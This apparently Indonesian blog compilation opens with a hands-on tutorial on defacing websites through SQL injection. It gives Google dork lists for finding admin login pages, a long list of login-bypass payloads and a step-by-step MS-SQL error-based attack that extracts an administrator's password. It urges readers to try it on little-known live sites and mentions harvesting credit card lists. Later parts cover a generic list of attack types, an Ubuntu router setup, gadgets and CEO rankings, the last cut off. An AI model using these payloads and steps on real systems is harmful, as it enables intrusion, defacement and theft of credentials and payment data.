Deface Website Dengan SQL Injection

zky-esemka >> SQL Injection adalah memasukkan kode-kode SQL untuk mendapatkan akses ke database yang lebih besar daripada yang seharusnya kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.

SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masih banyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.



Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Explorer
2. PC yang terhubung ke Internet

OK, langsung saja kita praktekkan, check this out :

Pertama bukalah [link ini] atau (mbah google) untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"

Anda bisa menambahkan daftarnya berdasarkan kreatifitas Anda sendiri. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).

Masukkan kode-kode berikut,
User name : ` or `a'='a
Password : ` or `a'='a
(termasuk tanda petiknya)

Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google. Menurut pengalaman saya, dari sekitar 20 link yang saya coba, ada dua atau tiga yang berhasil di ahir 2011.

Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a

Di bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Anda masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.

Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

=======================================================
Hingga Des 2011, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan Mr.X
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.

silahkan ambil contoh sebagai percobaan di situs google (usahakan milik situs yang gak terkenal dl buat percobaan)

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya, beserta nama tabel yang mungkin berbeda-beda. Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN), ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan klausa sum sebelum menentukan apakah jumlah kolom-kolom di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah) yang berlaku untuk type kolom numerik, jadi untuk type kolom yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN-- dengan kolom yang berikutnya. Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password, untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'-- artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan, atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u


Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.


Kita

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya. Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack oleh Shizoprenic, juga ada di tabel-tabel suatu database, jadi tetep bisa dimasuki dengan cara SQL Injection ini.


************************************************** ****
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
************************************************** ****
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa di inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

Cara - Cara Men Deface Website

zky-esemka >> sekarang saya akan menjelaskan kepada temen-temen tentang cara - cara men Deface Website, oke langsung aja kita mulai check this out :



1. IP SpoofingIP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.IP Spoofing terjadi ketika seorang attacker "mengakali" packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP AttackSalah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger ExploitsPada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar "memberitahu" password dan kode akses terhadap system.

4. Flooding & BroadcastingSeorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet AttacksData-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail ExploitsPeng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND VulnerabilitiesBerita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password AttacksPassword merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing

9.Proxy Server AttacksSalah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing AttacksTrusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya

11. Remote File System AttackProtokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program InsertionsSelective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port ScanningMelalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and PacketInterception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD Attacks Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.


Sumber Article : Open 

Cara Membuat PC Router Di Ubuntu Server Dalam Virtual Box

zky-esemka >> baiklah kali ini saya akan mengajarkan bagaiman cara membuat PC Router pada Ubuntu Server dalam VirtualBox, yang perlu di ingat apa bila anda membuatnya dalam virtual box atur dulu konfigurasinya, anda dapat melihat cara mengkonfigurasikan virtual box disini. 

Sebenarnya membuat PC Router di Virtual Box hampir sama dengan membuat PC Router langsung, oke tanpa basa-basi lagi, yuuuk check this out :D


1.::Login kedalam Ubuntu lalu masuk kedalam root, setelah masuk buat command di bawah ini

2.::nano /etc/network/interfaces
  : untuk pasang IP, jika eth1 nya gak ada ketikkan saja sendiri
                       isi : # the primary network interfaces
                             auto eth0
                             iface eth0 inet static  => (bisa static , bisa juga dhcp )
                             address 192.168.1.100   => ( IP dari wan /internet )
                             netmask 255.255.255.0
                             gateway 192.168.1.1
                           
                             auto eth1
                             iface eth1 inet  static     => (bisa static , bisa juga dhcp )
                             address 192.168.1.101       => ( IP terserah karna IP untuk client )
                             netmask 255.255.255.0
  : jika sudah terpasang keluar dengan
    mengetikkan "CTRL + X" lalu tekan "Y" lalu ENTER

2.:: nano /etc/resolv.conf
  : Lalu pasang DNS,
  : jika kosong ketikkan sendiri seperti ini : nameserver 8.8.8.8
  : setelah itu keluar dengan
    mengetikkan "CTRL + X" lalu tekan "Y" lalu ENTER

3.:: /etc/init.d/networking restart
  : setelah itu restart konfigurasi ethernet

4.:: echo "1" >/proc/sys/net/ipv4/ip_forward
  : ketikkan command di atas

5.:: nano /etc/sysctl.conf
  : cari tulisan seperti ini => " #net.ipv4. ip_forward=1 " lalu hapus tanda pagar nya, setelah itu keluar dengan
    mengetikkan "CTRL + X" lalu tekan "Y" lalu ENTER

6.:: iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  : ketikkan command di atas

7.:: nano /etc/rc.local
  :  ketikkan command di atas lalu ketik iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    di atas " exit 0 "

8.:: route -n
  : ketikkan command dia atas untuk meilhat routing sudah terpasang atau belum
  :: route add default gw 10.10.6.1   => ip gateway eth0 yg di pasang


keterangan :

=> untuk ip address client harus sama dengan IP address eth1 cuma yg membedakan host ID nya
=> cek apakah sudah terhubung atau belum. ketik "   ping <ip address yang dituju> -t

5 Gadget Keren Dan Unik

zky-esemka >> Tak ada yang menyangsikan tampilan modis dan kecanggihan yang disuguhkan iPhone 5, HTC One, Galaxy S4, BlackBerry Z10, serta Sony Xperia Z di pasar ponsel saat ini.

Namun karena saking populernya, deretan perangkat tersebut jadi terkesan tak lagi eksklusif, karena bisa dimiliki banyak orang dan wara-wiri di tempat umum.

Di sisi lain, tak sedikit gagdet yang memiliki desain dan kemampuan unik. Tetapi karena tidak terlalu disorot kamera dan diperjualbelikan secara luas, sehingga tak banyak orang tahu.

Padahal gadget-gadget ini dijamin menarik dan unik. Tak percaya? Lihat saja rangkumannya berikut ini seperti dilansir PCMag.

1. Ponsel Dua Wajah Yotaphone

Apple dan Samsung bisa dibilang sebagai rajanya industri smartphone saat ini. Tetapi sepertinya, kedua raksasa tersebut belum punya produk seperti yang dibuat Yotaphone ini.

Ponsel dua wajah, mungkin bisa menjadi sebutan yang pas buat produk besutan vendor asal Rusia yang bernama Yota ini.

Mereka memiliki model ponsel Android yang dilengkapi dengan layar ganda yang menghiasi kedua sisi bodi.

YotaPhone punya layar sentuh di bagian depan dan bagian belakang. Layar utama menggunakan teknologi LCD sedangkan layar kedua menggunakan e-ink electronic paper display (EPD) yang biasa dipakai di e-reader.

Layar utama ditujukan untuk operasional utama ponsel. Sedangkan layar kedua lebih ditujukan untuk menampilkan informasi media sosial dan informasi penting lainnya. Kedua layarnya berukuran 4,3 inch. Resolusi layar LCD mencapai 1280 x 720 pixel.

Yota adalah vendor asal Rusia yang bergerak di bisnis teknologi. YotaPhone sendiri adalah ponsel pertama mereka.

Kedua layar dilindungi Gorilla Glass yang anti gores. Rencananya, YotaPhone dipasarkan awal tahun 2013 di wilayah-wilayah tertentu.

Spesifikasinya cukup lumayan. Seperti prosesor dual core 1,5GHz, kamera 12 megapixel, baterai 2.100 mAh, sistem operasi Android Jelly Bean dan pilihan memori internal 32GB/64GB.

2. Shower 'Bernyanyi'

Aktivitas di kamar mandi dijamin akan lebih asyik dengan alat bernama Kohler Moxie ini. Sekilas, tampilannya tampak seperti shower pada umumnya.

Padahal jika ditelaah lebih lanjut, ia sudah dibenamkan dengan bluetooth speaker 1,5 watt.

Jadi ketika user sedang asyik mandi maka lantunan musik bisa dilontarkan dari shower yang digunakan tersebut. Cara yang tinggal menghubungkan shower Kohler Moxie dengan gadget Anda lewat fasilitas bluetooth.

Unik kan? Memang, perangkat ini belum dijual di seluruh negara, baru beberapa. Tapi jika berminat bisa membelinya via Amazon dengan harga lagi diobral menjadi USD USD 149,25. Adapun harga normalnya adalah USD 199,99.

3. Oakley Airwave Goggles

Kesampingkan sejenak bagi Anda yang menanti kehadiran kacamata pintar Google Glass. Toh, kenyataannya Google masih belum meluncurkan secara resmi produk anyarnya tersebut.

Sementara itu, produk kacamata yang tak kalah canggih sudah dijual ke pasaran. Salah satunya adalah Oakley Airwave Goggles.

Dengan banderol mencapai USD 599,99, produk ini tentunya punya kelebihan sendiri dibandingkan produk kacamata lainnya.

Selain kualitas kaca lensa yang digunakan juga jempolan, ia juga sudah disusupi unsur teknologi di dalamnya.

Salah satunya kemampuannya adalah dapat terhubung dengan ponsel pengguna. Ketika keduanya -- kacamata dan ponsel -- dikoneksikan, maka segala hal yang terjadi di ponsel pengguna dapat diketahui dari Oakley Airwave Google.

Saat digunakan, perangkat yang biasa digunakan untuk bermain ski dan snowboarding ini juga memiliki layar kecil yang dapat memberikan informasi seputar ketinggian, kecepatan, dan melihat panggilan yang masuk.

Oakley Airwave Google juga dipasangkan dengan gelang yang juga menjadi alat navigasi. Termasuk untuk mengontrol musik hingga GPS.

4. Pebble Smartwatch

Apple dan Samsung boleh saja digosipkan tengah adu cepat untuk membuat smartwatch alias jam tangan pintar.

Namun sebelumnya, Pebble sejatinya sudah mencuri perhatian dengan proyek jam tangan pintarnya.

Pebble tentu tak bisa disandingkan dengan Apple dan Samung yang merupakan para raksasa di industri teknologi saat ini.

Sebaliknya, Pebble Smartwatch justru berasal dari situs Kickstarter yang pada awalnya berjuang untuk mencari investor agar bisa memproduksi gadget besutan mereka.

Sampai akhirnya Pebble meraup dana USD 10 juta setelah 'diiklankan' KickStarter. Dan kini, saatnya menanti hasil produksi.

Untuk urusan kemampuan, produk yang konon bakal dibanderol di angka USD 150 ini mampu bersinergi dengan smartphone pengguna. Seperti menampilkan berbagai notifikasi, mengukur jarak suatu tempat, lokasi-lokasi restoran serta konektivitas lainnya.

"Pebble Smartwatch masih dalam tahap pengembangan, tetapi progres dari gadget ini mengesankan," puji analis dari PCMag, Eugene Kim.

5. Meja Treadmill

Perangkat bernama LifeSpan TR1200-DT5 Treadmill Desk Combination ini sekilas memang agak nyeleneh. Siapa yang mau aktivitas mengetik di laptop dikerjakan di atas treadmill?

Pun demikian, beberapa pihak coba melihat dari sisi yang berbeda dan keluar dengan jawaban "kenapa tidak?".

Pasalnya, aktivitas mengetik atau bekerja di depan laptop kadang malah menjadi suatu hal yang tidak mengenakkan. Dimana rasa pegal dan bosan bisa menghinggap.

Nah, cara unik pun coba ditawarkan LifeSpan lewat produk besutannya yang dijual seharga USD 1.499,99. Jadi nantinya, pengguna bisa mengetik sambil berolahraga di atas treadmill.

Tentu sebagai langkah awal, treadmill tak perlu disetting cepat yang membuat pengguna berlari. Cobalah untuk mengatur dalam posisi santai, dengan derap langkah jalan santai sambil mengutak-atik laptop Anda.

Tertarik?

Sumber Article : Open

10 Bos IT Yang Dicintai Karyawan-nya

zky-esemka >> Dalam industri teknologi yang sangat kompetitif saat ini, peran CEO alias Chief Executive Officer sebagai pemimpin perusahaan sangat penting. Keputusan dan kebijakan yang dihasilkan seorang CEO, menentukan sukses tidaknya perusahaan yang dinahkodainya.

Beberapa CEO teknologi seperti Mark Zuckerberg atau Tim Cook pun sukses menjadi sosok yang dicintai para karyawannya. Mungkin karena ketegasan sikapnya, kebijakannya yang tepat, kesejahteraan yang didapat dari perusahaan, dan faktor-faktor lainnya.

Riset dari Glasdoor yang mengumpulkan pendapat dari karyawan menghasilkan peringkat CEO perusahaan teknologi yang paling disukai. Berikut adalah daftarnya dari 10 - 1

10. Paul S. Otellini - Intel

Sebanyak 91% karyawan Intel menyetujui gaya kepemimpinan Paul sebagai CEO. Paul memang orang lama di raksasa prosesor tersebut dan telah menjadi CEO sejak tahun 2005.

Sebelum menjabat CEO, dia juga pernah memegang jabatan Chief Operating Officer dan Executive Vice President Intel. Saat ini, Otellini sedang mempersiapkan pengunduran dirinya dari jabatan CEO karena ingin pensiun.

"Kompensasi yang pantas, lingkungan kerja yang rileks dan manajemen yang berusaha mendengarkan karyawan," salah satu alasan karyawan menyukai Otellini.

9. Tim Cook - Apple

Sejumlah 93% karyawan Apple menyetujui Tim Cook sebagai pemimpin utama Apple. Cook bergabung di Apple pada bulan Maret 1998 sebagai SVP of Worldwide Sales and Operations.

Kemudian dia beralih posisi menjadi Chief Operating Officer. Sebelum ditunjuk untuk menggantikan Steve Jobs sebagai CEO Apple di 24 Agustus 2011.

"Manajemen yang hebat. Anda bekerja untuk produk konsumer yang paling menarik dan canggih, sekali Anda di sini, itu akan membuat Anda sangat bersemangat," salah satu alasan karyawan menyukai Cook.

8. Jeff Bezos - Amazon

Terdapat 93% karyawan Amazon menyukai gaya kepemimpinan Bezos. Bezos memang yang merintis Amazon dari awal hingga sekarang meraksasa sebagai retail online.

Berawal dari markas sederhana di sebuah garasi, kini Amazon menjual hampir segala macam barang. Juga gadet Android berupa tablet PC Kindle Fire.

"Amazon secara konstan beradaptasi dan mengembangkan strategi. Bezos adalah CEO yang hebat. Dia sangat mengerti soal kualitas," salah satu alasan karyawan menyukai Bezos.

7. Jen Hsun Huang - Nvidia

Sebanyak 94% pegawai Nvidia menyukai komando Jen Hsun Huang. Dia memang termasuk salah satu pendiri raksasa teknologi ini di tahun 1993.

Di masa kepemimpinannya, Jen turut andil menemukan Graphic Processing Unit (GPU) pada tahun 1999. Sejak saat itu, nama Nvidia pun makin berkibar.

"Jen memajukan perusahaan dengan langkah yang tepat dan membuat strategi agar perusahaan tidak gagal," salah satu alasan karyawan menyukai Jen.

6. Larry Page - Google

Sejumlah 95% karyawan Google menyukai Larry Page sebagai pemimpin utamanya. Pendiri Google bersama Sergey Brin ini menggantikan Eric Schmidt pada pertengahan tahun 2011.

Saat ini, posisi Google sebagai raksasa mesin cari online memang tidak juga tergoyahkan. Mereka juga sangat kuat di perangkat mobile dengan OS Android.

"Apa yang paling kusukai adalah mendengarkan pendiri Larry Page dan Sergey Brin berbicara dalam meeting besar. Mereka berdua lucu dan pintar," salah satu alasan karyawan menyukai Larry.

5. Pierre Nanterme - Accenture

Sebanyak 95% pegawai Accenture menyukai gaya kepemimpinan Pierre. Accenture sendiri adalah perusahaan yang bergerak di bidang layanan dan konsultasi IT.

Pierre mulai menjadi CEO Accenture pada Januari 2011. Dia sangat senior dan sudah bergabung di perusahaan ini sejak tahun 1983.

"Perusahaan sangat memperhatikan karyawan dan perkembangan karirnya," salah satu alasan karyawan menyukai Pierre.

4. Paul E. Jacobs - Qualcomm

Sejumlah 95% pegawai Qualcomm senang dengan Paul sebagai nahkoda utama perusahaan. Dengan tangan dinginnya, Qualcomm semakin meraksasa sebagai raksasa semikonduktor global.

Paul sudah menjadi CEO Qualcomm sejak Juli 2005. Dia mulai berkarir di perusahaan asal Amerika Serikat ini pada tahun 1990.

"Perusahaan ini digerakkan oleh CEO dengan mentalitas start up yang sangat kuat. Setiap orang bebas bereksperimen dan berkontribusi," salah satu alasan karyawan menyukai Paul.

3. Frank D'Souza - Cognizant

Cognizant adalah perusahaan asal Amerika Serikat yang bergerak di sektor konsultasi IT dan layanan business process outsourcing. Sang pemimpin Frank D'Souza disukai oleh 96% karyawannya.

Di tahun 2007, pada usia 38 tahun, dia ditunjuk menjadi CEO Cognizant. Frank juga termasuk salah satu pendiri perusahaan yang berkembang pesat ini.

